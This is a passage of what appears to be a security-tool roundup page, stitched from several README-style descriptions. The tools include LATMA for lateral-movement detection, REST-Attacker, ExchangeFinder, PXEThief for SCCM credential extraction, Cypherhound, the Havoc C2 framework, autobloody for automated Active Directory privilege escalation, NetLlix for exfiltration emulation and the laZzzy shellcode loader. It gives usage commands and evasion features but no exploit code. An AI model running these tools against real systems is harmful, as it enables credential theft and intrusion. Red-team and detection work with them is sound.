SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel Fernรกndez (@TheXC3LL)

References



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.


The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attackerโ€™s movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.

  • Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services โ€œrpcโ€, โ€œrpcssโ€ and โ€œtermsrv.โ€

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeksโ€™ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.

The lateral movement IoCs are:

Whiteโ€ฏ cane โ€ฏ- User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attackโ€™s objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)

Weight Shift - White cane (see above) from machine A to machines {B1,โ€ฆ, Bn}, followed by another White cane from machine Bx to machines {C1,โ€ฆ,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attackโ€™s purposes from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

usage

The Collector

Required arguments:

  1. credentials [domain.com/]username[:password] credentials format alternatively [domain.com/]username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format

Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python >3.10 for running the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code ammendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.

Currently, the tool has a signature of every version from Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the header X-OWA-Version we can identify the exact version.

If the tool found a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ poetry install 1 โจฏ
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

โ€ข Installing pyparsing (3.0.9)
โ€ข Installing attrs (22.1.0)
โ€ข Installing certifi (2022.6.15)
โ€ข Installing charset-normalizer (2.1.1)
โ€ข Installing idna (3.3)
โ€ข Installing more-itertools (8.14.0)
โ€ข Installing packaging (21.3)
โ€ข Installing pluggy (0.13.1)
โ€ข Installing py (1.11.0)
โ€ข Installing urllib3 (1.26.12)
โ€ข Installing wcwidth (0.2.5)
โ€ข Installing dnspython (2.2.1)
โ€ข Installing pytest (5.4.3)
โ€ข Installing requests (2.28.1)
โ€ข Installing termcolor (1.1.0)< br/>
Installing the current project: ExchangeFinder (0.1.0)

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

โ”Œโ”€โ”€(kali&#129 27;kali)-[~/Desktop/ExchangeFinder]
โ””โ”€$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan single domain you can use the option --domain like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domain dummyexchangetarget.com                                                                                           


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexch angetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Scan multiple domains

To scan multiple domains (targets) you can use the option --domains and choose a file like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domains domains.txt                                                                                                          


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records f ound for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Please note that the examples used in the screenshots are resolved in the lab only

This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances, feel free to open PR if you find any issue or you have a new thing to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collectio n Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly over permissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1 it will attempt to use the interface that can reach the machine's default GW as output interface. If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific inteface with 'manual_interface_selection_by_id'.
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one, if it is not correct, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools parse exported JSON graphs, I need graph results in a line-by-line format .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams to reveal detailed information about their Active Directory environments as well.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers as of date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export will be just end object to be used as target list with tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>

Commands

The full command menu is shown below:

Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the number of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0, certain edges will not work for previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest paths exports are all the same (raw or not) due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you decide to open and if possible provide output (if applicable).



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.

ย 

Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is composed of two steps:

  • Finding the optimal path for privesc using bloodhound data and neo4j queries.
  • Execute the path found using bloodyAD package

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.

โš ๏ธ
-ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain).

Once a path is generated, autobloody will connect to the DC and execute the path and clean what is reversible (everything except ForcePasswordChange and setOwner).

Limitations

For now, only the following BloodHound edges are currently supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed w/o the usage of native API's. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below metioned progamming/scripting languages:

  • CNet/WebClient: Developed in CLang to generate network traffic using the well know WIN32 API's (WININET & WINHTTP) and raw socket programming.
  • HashNet/WebClient: A C# binary to generate network traffic using .NET class like HttpClient, WebRequest and raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.

Usage:

Download the latest ZIP from realease.

Running the server:

  • With SSl: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>


laZzzy - Shellcode Loader, Developed Using Different Open-Source Libraries, That Demonstrates Different Execution Techniques


laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.

Features

  • Direct syscalls and native (Nt*) functions (not all functions but most)
  • Import Address Table (IAT) evasion
  • Encrypted payload (XOR and AES)
    • Randomly generated key
    • Automatic padding (if necessary) of payload with NOPS (\x90)
